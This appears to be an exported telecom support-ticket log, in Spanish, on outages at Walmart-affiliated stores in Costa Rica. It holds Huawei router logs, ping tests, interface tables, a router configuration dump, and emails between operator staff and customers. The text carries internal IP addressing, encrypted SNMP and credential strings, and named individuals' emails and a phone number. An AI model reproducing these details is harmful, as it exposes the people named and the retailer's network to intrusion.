JUN 17 2022 15:11:02-06:00 CC_WALMART_CR_TIENDA_3092 %%01OSPF/4/NBR_CHANGE_E(L)[7]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.94, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
JUN 17 2022 15:11:01-06:00 CC_WALMART_CR_TIENDA_3092 %%01NTP/4/PEER_SELE(L)[8]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
JUN 17 2022 15:11:01-06:00 CC_WALMART_CR_TIENDA_3092 %%01NTP/4/STRATUM_CHANGE(L)[9]:SYSTEM STRATUM CHANGES FROM 16 TO 4 AFTER CLOCK UPDATE.
JUN 17 2022 15:11:01-06:00 CC_WALMART_CR_TIENDA_3092 %%01NTP/4/LEAP_CHANGE(L)[10]:SYSTEM LEAP CHANGES FROM 3 TO 0 AFTER CLOCK UPDATE.
JUN 17 2022 03:28:18-06:00 CC_WALMART_CR_TIENDA_3092 %%01NTP/4/PEER_SELE(L)[11]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
JUN 17 2022 03:28:18-06:00 CC_WALMART_CR_TIENDA_3092 %%01DEV/4/ENTUP(L)[12]:AR129CGVW-L BOARD[0] REGISTER SUCCESS.
JUN 17 2022 03:28:15-06:00 CC_WALMART_CR_TIENDA_3092 %%01OSPF/4/NBR_CHANGE_E(L)[13]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.94, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
JUN 17 2022 03:28:15-06:00 CC_WALMART_CR_TIENDA_3092 %%01OSPF/4/NBR_CHANGE_E(L)[14]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.94, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
JUN 17 2022 03:28:11-06:00 CC_WALMART_CR_TIENDA_3092 %%01IFNET/4/LINK_STATE(L)[15]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/1 HAS ENTERED THE UP STATE.
JUN 17 2022 03:28:11-06:00 CC_WALMART_CR_TIENDA_3092 %%01IFPDT/4/IF_STATE(L)[16]:INTERFACE GIGABITETHERNET0/0/1 HAS TURNED INTO UP STATE.
JUN 17 2022 03:28:09-06:00 CC_WALMART_CR_TIENDA_3092 %%01IFNET/4/LINK_STATE(L)[17]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE UP STATE.
JUN 17 2022 03:28:09-06:00 CC_WALMART_CR_TIENDA_3092 %%01IFNET/4/LINK_STATE(L)[18]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE UP STATE.
JUN 17 2022 03:28:09-06:00 CC_WALMART_CR_TIENDA_3092 %%01IFPDT/4/IF_STATE(L)[19]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
JUN 17 2022 03:28:06-06:00 CC_WALMART_CR_TIENDA_3092 %%01IFPDT/4/IF_STATE(L)[20]:INTERFACE WLAN-RADIO0/0/1 HAS TURNED INTO UP STATE.
JUN 17 2022 03:28:05-06:00 CC_WALMART_CR_TIENDA_3092 %%01IFPDT/4/IF_STATE(L)[21]:INTERFACE WLAN-RADIO0/0/0 HAS TURNED INTO UP STATE.
JUN 17 2022 03:27:58-06:00 CC_WALMART_CR_TIENDA_3092 %%01NTP/4/PEER_LOCALADDR_USED(L)[22]:NTP: NTPNEWPEER OF PSTLOCALADDR IS OK.
JUN 17 2022 03:27:58-06:00 CC_WALMART_CR_TIENDA_3092 %%01NTP/4/PEER_LOCALADDR_USEING(L)[23]:NTP: NTPNEWPEER OF PSTLOCALADDR IS USING.
JUN 17 2022 03:27:58-06:00 CC_WALMART_CR_TIENDA_3092 %%01NTP/4/PEER_LOCALADDR_USED(L)[24]:NTP: NTPNEWPEER OF PSTLOCALADDR IS OK.
JUN 17 2022 03:27:58-06:00 CC_WALMART_CR_TIENDA_3092 %%01NTP/4/PEER_LOCALADDR_USEING(L)[25]:NTP: NTPNEWPEER OF PSTLOCALADDR IS USING.
JUN 17 2022 03:27:54-06:00 CC_WALMART_CR_TIENDA_3092 %%01RM/4/ROUTERID_CHANGE(L)[26]:THE ROUTER ID IS 10.201.11.149. (INSTANCEID=0)
JUN 17 2022 03:27:49-06:00 CC_WALMART_CR_TIENDA_3092 %%01IFNET/4/LINK_STATE(L)[27]:THE LINE PROTOCOL IP ON THE INTERFACE LOOPBACK5 HAS ENTERED THE UP STATE.
JUN 17 2022 03:27:48-06:00 CC_WALMART_CR_TIENDA_3092 %%01IFPDT/4/IF_STATE(L)[28]:INTERFACE WLAN-BSS7 HAS TURNED INTO UP STATE.
JUN 17 2022 09:27:12+00:00 CC_WALMART_CR_TIENDA_3092 %%01IFPDT/4/DRVICOUTSTR(L)[29]:3G/LTE MODULE ON CELLULAR0/0/0 IS INSERTED!
JUN 17 2022 09:26:24+00:00 CC_WALMART_CR_TIENDA_3092 %%01GTL/4/STATECHANGED(L)[30]:LICENSE STATE CHANGED FROM NULL TO DEFAULT.
&lt;CC_WALMART_CR_TIENDA_3092&gt;
DISPLAY CLOCK
2022-06-21 23:59:45
TUESDAY
TIME ZONE(GMT) : UTC-06:00
&lt;CC_WALMART_CR_TIENDA_3092&gt;
TABLA ARP DEL ROUTER CPE:
DISPLAY ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                    VLAN/CEVLAN(SIP/DIP)      PVC
------------------------------------------------------------------------------
22.32.5.93      40EE-DD7A-1692            I -         GE0/0/1
22.32.5.94      0021-A0A2-C348  18        D-0         GE0/0/1
10.201.11.149   40EE-DD7A-1691            I -         GE0/0/0.1107
10.201.11.129   505D-AC64-7F7C  20        D-0         GE0/0/0.1107
                                          1107/-
10.201.41.149   40EE-DD7A-1691            I -         GE0/0/0.2107
10.201.41.129   F4DE-AF06-70A8  20        D-0         GE0/0/0.2107
                                          2107/-
------------------------------------------------------------------------------
TOTAL:6         DYNAMIC:3       STATIC:0     INTERFACE:3
&lt;CC_WALMART_CR_TIENDA_3092&gt;
INTERFACES DEL ROUTER:
DISPLAY INT DESC
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
(V): VIRTUALPORT
INTERFACE                     PHY     PROTOCOL DESCRIPTION
CELL0/0/0                     DOWN    DOWN     HUAWEI, AR SERIES, CELLULAR0/0/0
                                               INTERFACE
ETH0/0/0                      *DOWN   DOWN     HUAWEI, AR SERIES, ETHERNET0/0/0
                                               INTERFACE
GE0/0/0                       UP      DOWN     ENLACE DATOS
GE0/0/0.1107                  UP      UP       WAN PRINCIPAL/_/CONTR0001633138OC
                                               /_/
GE0/0/0.2107                  UP      UP       REDUNDANCY LINK TO MTR488
GE0/0/1                       UP      UP       LAN DEL CLIENTE
GE0/0/2                       *DOWN   DOWN     LIBRE
GE0/0/3                       *DOWN   DOWN     LIBRE
GE0/0/4                       *DOWN   DOWN     LIBRE
GE0/0/5(V)                    *DOWN   DOWN     VIRTUALPORT
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC
                                               E
VLANIF1                       *DOWN   DOWN     HUAWEI, AR SERIES, VLANIF1 INTERF
                                               ACE
WLAN-BSS7                     UP      UP       HUAWEI, AR SERIES, WLAN-BSS7 INTE
                                               RFACE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               1 INTERFACE
&lt;CC_WALMART_CR_TIENDA_3092&gt;
DISPLAY  IP INT BRIEF
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 6
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 5
THE NUMBER OF INTERFACE THAT IS UP IN PROTOCOL IS 5
THE NUMBER OF INTERFACE THAT IS DOWN IN PROTOCOL IS 6
INTERFACE                         IP ADDRESS/MASK      PHYSICAL   PROTOCOL
CELLULAR0/0/0                     UNASSIGNED           DOWN       DOWN
ETHERNET0/0/0                     UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/0              UNASSIGNED           UP         DOWN
GIGABITETHERNET0/0/0.1107         10.201.11.149/26     UP         UP
GIGABITETHERNET0/0/0.2107         10.201.41.149/26     UP         UP
GIGABITETHERNET0/0/1              22.32.5.93/30        UP         UP
GIGABITETHERNET0/0/4              UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/5              UNASSIGNED           *DOWN      DOWN
LOOPBACK5                         10.99.77.120/32      UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           UNASSIGNED           *DOWN      DOWN
&lt;CC_WALMART_CR_TIENDA_3092&gt;
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_WALMART 10.201.11.149
  PING 10.201.11.149: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.11.149 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.36.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DATOS_WALMART 10.201.11.149
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DATOS_WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.201.11.128/26  DIRECT  0    0             D   10.201.11.129   GIGABITETHERNET4/0/1.1107			</t>
  </si>
  <si>
    <t>***--- SE ADJUNTA LISTADO DE IDS AFECTADOS CON UN ID CORREGIGO --****
  769                          22.32.6.246    CONTR0001542688OC          MAXI PALI TAMARINDO (SE CORRIGE ID)
  3109                        22.32.2.182    CONTR0001504372OC          PALI PARRITA
  4215                        22.32.3.214    CONTR0001428100OC         MAXI PALI QUEPO
  4486                        22.32.5.158    CONTR0001428099OC         MAXI PALI PARRITA</t>
  </si>
  <si>
    <t>SE REVISA ENALCE POR ENLACE LOS CUALES SON AFECTADOS POR UNA INTERVENCION A LA RED RIR 5481092 SE PORCEDE A INDICAR AL CLIENTE QUE SE TIENE UNA AFECTACION GENERAL EN EL AREA.</t>
  </si>
  <si>
    <t>DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 22 DE JUNIO DE 2022 1:13
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; ERICK ORELLANA (VENDOR) &lt;ERICK.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI PALI TAMARINDO ID: CONTR00015426880OC
ESTIMADO CLIENTE EL MOTIVO DEL CORREO ES PARA DARLE SEGUIMIENTO A SUS SERVICIOS REPORTADOS COMO CAÍDA YA SE ENCUENTRAN OPERATIVOS FUERON AFECTADOS POR UN REINICIO EN NUESTROS
769                          22.32.6.246    CONTR0001542688OC          MAXI PALI TAMARINDO
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_WALMART 10.201.11.22
  PING 10.201.11.22: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.11.22 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 3/4/117 MS
3109                        22.32.2.182    CONTR0001504372OC          PALI PARRITA
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_WALMART 10.201.11.149
  PING 10.201.11.149: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.11.149 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
4215                        22.32.3.214    CONTR0001428100OC         MAXI PALI QUEPO
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_WALMART 10.201.11.22
  PING 10.201.11.22: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.11.22 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 3/4/117 MS
4486                        22.32.5.158   CONTR0001428099OC         MAXI PALI PARRITA
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_WALMART 10.201.11.21
  PING 10.201.11.21: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.11.21 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/3/4 MS
 SE ADJUNTA EVIDENCIAS DE QUE YA SE ENCUENTRAN OPERATIVOS POR FAVOR VALIDAR QUE SE ENCUENTRE FUNCIONANDO CORRECTAMENTE.</t>
  </si>
  <si>
    <t>F4611633</t>
  </si>
  <si>
    <t>SE FINALIZA INTERVENCION SE PROCEDE A VALIDAR CON CLIENTE SE YA SE ENCUENRA OPERATIVO Y SIN PERDIDAS LOS TIEMPOS SON CORRECTOS
&lt;GCANCRCAN1W1N01O01EIM1&gt;PING -C 1000 -B -M 10  -VPN VPN_SCOTIABANK-GT_0 10.22.2.37
  PING 10.22.2.37: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.22.2.37 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE CON EVIIDENCIA DE LA RECONVERGENCIA SE REALIZA  EN HORARIO DE LA VENTANA.</t>
  </si>
  <si>
    <t>***---  SE RESPONDE CORREO A CL --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 02:51
PARA: CASTAÑEDA CUEVAS CARLOS EMILIO &lt;CCCUEVAS@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMSCI003135 || ID LOCAL F2S-M04619CR-CR8205-NP [CONTR0002277118OC] || LATENCIA HACIA GUADALAJARA
ESTIMADO SR. CASTAÑEDA.
                LAMENTAMOS LOS INCONVENIENTES, PERSONAL A CARGO NOS INDICA QUE EL SERVICIO ESTÁ SIENDO AFECTADO POR UNA FALLA EN EL ÁREA.
ACTUALMENTE YA HAY PERSONAL TÉCNICO TRABAJANDO EN RESOLVER LA MISMA, ESPERAMOS COMPARTIR MÁS AVANCES A LA BREVEDAD POSIBLE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: CASTAÑEDA CUEVAS CARLOS EMILIO [MAILTO:CCCUEVAS@UNINET.COM.MX]
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 02:45
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMSCI003135 || ID LOCAL F2S-M04619CR-CR8205-NP [CONTR0002277118OC] || LATENCIA HACIA GUADALAJARA
ESTIMADOS,
¿SE TIENE COMENTARIOS CON RESPECTO  A ESTE INCIDENTE?
SALUDOS
C. EMILIO CASTAÑEDA CUEVAS
OPER CIAP GESTION Y SOPORTE JR
CENTRO NACIONAL DE OPERACIÓN DE REDES DE CLIENTES
CORREO: CCCUEVAS@UNINET.COM.MX
TEL. +52 55 5174-5299
CORREO: CNOC.INTL@UNINET.COM.MX</t>
  </si>
  <si>
    <t>SE ENVIARA EVIDENCIA AL CLIENTE DE LA CAIDA FUE PROVOCADO A NIVEL DE BGP</t>
  </si>
  <si>
    <t>F4611643</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR NUÑEZ AL 2243-7253 CONTESTA EL SEÑOR DIEGO MORA CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET **
-ID 1001551836
**</t>
  </si>
  <si>
    <t>F4611644</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR NUÑEZ AL 2243-7253 CONTESTA EL SEÑOR DIEGO MORA CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET **
-ID 1001552313
**</t>
  </si>
  <si>
    <t xml:space="preserve">ENLACE OPERATIVO SE FUE AFECTADO POR RIR 5481092 SE PORCEDE A VALIDAR CON CLIENTE
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 7 SEMANAS.
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.160 (AR160 V200R008C20SPC800)
COPYRIGHT (C) 2011-2016 HUAWEI TECH CO., LTD
HUAWEI AR129CGVW-L ROUTER UPTIME IS 7 WEEKS, 0 DAY, 18 HOURS, 9 MINUTES
MPU 0(MASTER) : UPTIME IS 7 WEEKS, 0 DAY, 18 HOURS, 9 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR129CGVW-L
4. BOOTROM  VERSION  : 1
&lt;CC_WALMART_CR_TIENDA_4486&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V200R008C20SPC800]
#
 SYSNAME CC_WALMART_CR_TIENDA_4486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6 MINUS 06:00:00
#
 UNDO ICMP-REPLY FAST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DHCP ENAB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5.156 0.0.0.3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WBRGCF68BU&amp;*:I:O*BY@W~#8S)(&amp;Q0NM~[XN#TZ,LVYLS-M$F-&lt;PLG=!JLR3%^%#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DESCRIPTION LAN DEL CLIENTE
 SHUTDOWN
#
INTERFACE ETHERNET0/0/0
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/0
 UNDO PORTSWITCH
 DESCRIPTION WAN PRINCIPAL/_/CONTR0001428099OC/_/
 SET FLOW-STAT INTERVAL 30
 UNDO ICMP HOST-UNREACHABLE SEND
 UNDO ICMP PORT-UNREACHABLE SEND
 UNDO ICMP TTL-EXCEEDED SEND
#
INTERFACE GIGABITETHERNET0/0/0.1104
 DESCRIPTION PRIMARY LINK TO MTR105
 DOT1Q TERMINATION VID 1104
 IP ADDRESS 10.201.11.21 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/0.2104
 DESCRIPTION REDUNDANCY LINK TO MTR488
 DOT1Q TERMINATION VID 2104
 IP ADDRESS 10.201.41.21 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/1
 UNDO PORTSWITCH
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.32.5.157 255.255.255.252
 OSPF NETWORK-TYPE P2P
 OSPF TIMER DEAD 60
#
INTERFACE GIGABITETHERNET0/0/2
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/3
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/4
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
 SHUTDOWN
#
INTERFACE CELLULAR0/0/0
#
INTERFACE CELLULAR0/0/1
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.75.199 255.255.255.255
#
BGP 64525
 ROUTER-ID 10.99.75.199
 PEER 10.201.11.1 AS-NUMBER 14754
 PEER 10.201.41.1 AS-NUMBER 14754
 #
 IPV4-FAMILY UNICAST
  UNDO SYNCHRONIZATION
  NETWORK 10.99.75.199 255.255.255.255
  IMPORT-ROUTE OSPF 65410
  PEER 10.201.11.1 ENABLE
  PEER 10.201.11.1 ROUTE-POLICY LOCAL_PREFERENCE IMPORT
  PEER 10.201.11.1 ROUTE-POLICY LOCAL_PREFERENCE EXPORT
  PEER 10.201.11.1 NEXT-HOP-LOCAL
  PEER 10.201.41.1 ENABLE
  PEER 10.201.41.1 NEXT-HOP-LOCAL
#
OSPF 65410
 DEFAULT-ROUTE-ADVERTISE
 IMPORT-ROUTE DIRECT
 IMPORT-ROUTE OSPF 450
 AREA 0.0.0.0
  NETWORK 22.32.5.156 0.0.0.3
#
ROUTE-POLICY OSPF_DATOS_WALMART PERMIT NODE 10
 IF-MATCH ACL 2999
#
ROUTE-POLICY LOCAL_PREFERENCE PERMIT NODE 10
 APPLY LOCAL-PREFERENCE 200
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB0360DEF3292F85
 SNMP-AGENT COMMUNITY READ %^%#9G|FEVBZR.9+S:94J3G(I$DRHKM,6'.^\R&lt;QKI*LE#$FTP`V|7@CG:5GP]|6^XPDC+[WMV=8A5DXS`+3%^%# ACL 2988
 SNMP-AGENT SYS-INFO LOCATION DE LACARRETERA PRINCIPAL HACIA PARRITA 1KM ANTES DEL CENTRO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lt;CC_WALMART_CR_TIENDA_4486&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 63
JUN 19 2022 00:02:15-06:00 CC_WALMART_CR_TIENDA_4486 %%01BGP/3/STATE_CHG_UPDOWN(L)[0]:THE STATUS OF THE PEER 10.201.11.1 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN 19 2022 00:02:07-06:00 CC_WALMART_CR_TIENDA_4486 %%01BGP/3/STATE_CHG_UPDOWN(L)[1]:THE STATUS OF THE PEER 10.201.41.1 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN 18 2022 22:41:08-06:00 CC_WALMART_CR_TIENDA_4486 %%01RM/4/IPV4_DEFT_RT_CHG(L)[2]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=DELETE, INSTANCEID=0, PROTOCOL=BGP, EXITIF=GIGABITETHERNET0/0/0.1104, NEXTHOP=10.201.11.1, NEIGHBOUR=10.201.11.1, PREFERENCE=255, LABEL=NULL, METRIC=0)
JUN 18 2022 22:41:08-06:00 CC_WALMART_CR_TIENDA_4486 %%01BGP/3/STATE_CHG_UPDOWN(L)[3]:THE STATUS OF THE PEER 10.201.11.1 CHANGED FROM ESTABLISHED TO IDLE. (INSTANCENAME=PUBLIC, STATECHANGEREASON=HOLD TIMER EXPIRED)
JUN 18 2022 22:40:53-06:00 CC_WALMART_CR_TIENDA_4486 %%01BGP/3/STATE_CHG_UPDOWN(L)[4]:THE STATUS OF THE PEER 10.201.41.1 CHANGED FROM ESTABLISHED TO IDLE. (INSTANCENAME=PUBLIC, STATECHANGEREASON=HOLD TIMER EXPIRED)
JUN 13 2022 12:38:46-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[5]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 13 2022 12:37:48-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[6]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 13 2022 12:12:33-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[7]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 13 2022 12:11:53-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[8]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 13 2022 12:11:13-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[9]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 12 2022 22:17:11-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[10]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 12 2022 05:55:35-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[11]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 12 2022 05:54:55-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[12]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 12 2022 05:29:22-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[13]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 12 2022 05:28:41-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[14]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
